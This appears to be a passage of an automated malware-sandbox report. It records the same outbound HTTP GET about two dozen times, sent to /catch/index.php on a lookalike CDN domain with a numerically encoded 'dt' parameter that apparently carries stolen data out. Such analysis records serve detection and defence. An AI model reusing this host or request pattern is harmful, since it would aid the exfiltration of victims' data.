    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
